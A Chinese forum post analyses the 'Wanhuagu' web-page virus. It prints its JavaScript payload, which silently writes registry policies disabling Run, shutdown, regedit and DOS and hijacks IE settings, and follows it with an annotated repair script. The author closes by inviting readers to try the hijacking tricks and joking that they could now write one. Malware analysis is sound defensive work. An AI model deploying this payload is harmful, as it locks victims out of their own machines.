我认为要想学好病毒,最好的途径就是分析病毒源码!最近听说毒木成林要招聘新的版主了,为了响应这一号召,小菜就拙笔分析一下万花谷病毒,如有不好的地方还请高手指教。
万花谷病毒发作时有如下几个特征:
(1)用户不能正常使用WINDOWS的DOS功能程序;
(2)用户不能正常退出WINDOWS,
(3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。
(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。
具体的表现形式是:
a:网络地址是:
www.on888.xxx.xxx.com;
b:在IE的"收藏夹"中自动加上"万花谷"的快捷方式,网络地址是:"http://96xx.xxx.com";
好了,那就让我们看看它是如何来实现这些特征的:
以下就是这个病毒的代码:
<SCRIPT language=JavaScript>
// Writes an invisible applet whose class lets page script instantiate COM objects by CLSID
// (see the setCLSID/createInstance/GetObject calls in f). Everything on this page depends on
// the browser letting this applet run; a configuration that blocks it, or blocks scripting of
// ActiveX controls not marked safe, never reaches the registry writes below.
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
// Creates an Internet-shortcut (.URL) file named DispName inside folder loc, pointing at SiteURL.
// Relies on the global shell object Shl that f() obtains through the applet (presumably a
// WScript.Shell-style object, since CreateShortcut/RegWrite are the only methods used).
// Defined but never called anywhere in this listing.
function AddFavLnk(loc, DispName, SiteURL)
{
var shortcutPath = loc + "\\" + DispName + ".URL";
var shortcut = Shl.CreateShortcut(shortcutPath);
shortcut.TargetPath = SiteURL;
shortcut.Save();
}
// Payload. Scheduled by init() one second after load, with no user action. Everything here
// depends on the hidden applet written by document.write() above handing COM objects to script;
// a browser that refuses that applet never executes a single registry write.
function f(){
try
{
<!--ActiveX initialization-->
// NOTE(review): the next line is bare text, not JavaScript; as printed the script cannot parse,
// so this copy of the sample is not runnable as-is.
ActiveX initialization
// Three COM objects are requested in turn. The CLSIDs are blanked in this listing, so which
// components were used cannot be confirmed here. Only Shl is used afterwards (RegWrite below,
// CreateShortcut in AddFavLnk); FSO and Net are obtained and then never touched.
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject();
try
{
// Run-once guard keyed on a "Chg" cookie. As printed, "documents .cookies" is not the DOM cookie
// property (looks like a transcription error); that access would throw and the empty catch below
// would swallow it, so nothing past this point executes from this copy.
if (documents .cookies.indexOf("Chg") == -1)
{
<!--Change the IE start page (left commented out in this sample)-->
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "
http://com.6to23.com/");
// Marker cookie. Its expiry is now + 1 ms, so it is effectively expired the moment it is set
// and the guard above would not stop a repeat visit.
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
<!--Rewrite the registry: Explorer/System/WinOldApp policies under HKCU, logon notice and IE title under HKLM-->
// The values below are what to inspect and reset on an affected machine.
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
//removes "Run" from the Start menu
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
//removes "Shut Down" from the Start menu
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
//removes "Log Off" from the Start menu
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD");
//hides drive letters in Explorer. NoDrives is a bitmask; the value is passed as a string, so the
//DWORD that actually lands depends on RegWrite's string-to-number conversion
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");
//blocks regedit, so the victim cannot undo the above by hand
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
//disables the MS-DOS prompt and "restart in MS-DOS mode" (Win9x); with the keys above this is
//the lockout described in the write-up
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "您的计算机已经被
http://www.cnhack.org/优化: )");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "您的计算机已经被
http://www.cnhack.org/优化: )");
//sets the logon legal-notice dialog shown before the desktop appears. These are HKLM writes:
//on NT-based Windows they only succeed for an administrator; Win9x has no such protection
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★
http://com.6to23.com/ &
http://www.cnhack.org/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★
http://com.6to23.com/ &
http://www.cnhack.org/");
//sets the IE title-bar text
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
// Both handlers swallow everything: a blocked COM object or a refused registry write leaves no
// visible trace in the browser.
catch(e)
{}
}
catch(e)
{}
}
// Delays the payload by one second. The string form of setTimeout evaluates "f()" as code in
// the global scope rather than passing the function itself.
function init()
{
setTimeout("f()", 1000);
}
<!--Runs f() about one second after the page opens: the registry changes need no click from the user-->
init();</SCRIPT>
以下是利用一段类似的JavaScript代码修复各项的键值:
<SCRIPT language=JavaScript>
// Same invisible applet as the payload above: it is the bridge that lets page script create COM
// objects by CLSID. The repair route therefore only works in the same unsafe browser configuration
// that allowed the infection; resetting the keys with regedit or a .reg file does not need it.
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
// Creates an Internet-shortcut (.URL) file named DispName inside folder loc, pointing at SiteURL.
// Uses the global shell object Shl that f() sets up through the applet (presumably a
// WScript.Shell-style object; CreateShortcut/RegWrite are the only methods used on it).
// Carried over from the payload listing; nothing in the repair script calls it.
function AddFavLnk(loc, DispName, SiteURL)
{
var shortcutPath = loc + "\\" + DispName + ".URL";
var shortcut = Shl.CreateShortcut(shortcutPath);
shortcut.TargetPath = SiteURL;
shortcut.Save();
}
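// Repair routine: reverts the policy and UI keys that the payload above writes, through the same
// applet/COM route. Changes from the version first posted: WinOldApp\Disabled and
// WinOldApp\NoRealMode are now cleared (the posted repair rewrote them as 1, so the MS-DOS
// lockout stayed in place); the start page is reset to about:blank instead of being left as a
// commented-out line; the unused FSO/Net objects are not created; the stray "ActiveX
// initialization" text and the "documents .cookies" typo that stopped the posted version from
// running are fixed. Shl stays a global because AddFavLnk() reads it.
// Errors are still swallowed on purpose: a failure here almost always means the browser refused
// the applet or the registry write, which is the safe outcome for a hardened machine. Where a
// choice exists, prefer resetting these keys with regedit or a .reg file rather than a web page.
function f(){
try
{
// ActiveX initialization through the hidden applet. The CLSID is left blank here as in the
// listing (placeholder); the returned Shl must expose RegWrite() for the calls below.
var a1 = document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
try
{
// Guard so the reset runs once per session.
if (document.cookie.indexOf("Chg") == -1)
{
// Start page: about:blank is a neutral default (the payload overwrote whatever the user had).
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "about:blank");
// Explorer policies: 0 brings Run, Shut Down and Log Off back onto the Start menu.
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 0, "REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 0, "REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 0, "REG_BINARY");
// NoDrives is a bitmask of drive letters hidden in Explorer; 0 hides none.
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", 0, "REG_DWORD");
// Re-enable regedit.
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 0, "REG_DWORD");
// Re-enable the MS-DOS prompt and "restart in MS-DOS mode" (both were left at 1 in the posted repair).
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", 0, "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", 0, "REG_DWORD");
// Clear the logon legal-notice dialog. HKLM writes need write access to the machine hive,
// i.e. an administrator on NT-based Windows.
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "");
// Restore the default IE title-bar text in both hives the payload touched.
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
// Marker cookie, kept as in the listing. Its expiry is now + 1 ms, so in practice it never
// persists and the guard above does not stop a repeat run; harmless for a repair.
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toUTCString() + "; path=/;";
}
}
catch(e)
{
// A registry write was refused or Shl is not the expected object: nothing to undo, stop quietly.
}
}
catch(e)
{
// Applet blocked or document.applets empty: the browser does not allow this route at all.
}
}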
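// Schedules the repair routine one second after the page is parsed. The function reference is
// passed directly instead of the string "f()", so nothing is evaluated from a string.
function init()
{
setTimeout(f, 1000);
}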
<!--Runs the repair about one second after the page opens, on the same schedule the payload used-->
init();</SCRIPT>
注册表打开方法:开始/运行/regedit
其中Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "");
这个开机重设我们可以自己试试,引号里面的字我们可以随便加,这个就会在开机进入桌面前会弹出一个对话框,写有你设置的文字,单击确定或回车取消。不动则进不了桌面!
修改IE主页的方法是设置:
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
好了,当我们了解它的发病原理时,当再次遇到这种类似的情况就不会害怕了,自己也就可以解决了,所以说,要想学好病毒,要想了解病毒,要想成为杀毒专家,必须要分析病毒,其实现在你可以按照这个源码编写一个了,呵呵,开个玩笑啊。本源码仅供学习使用,请勿做非法用途,违者自负责任!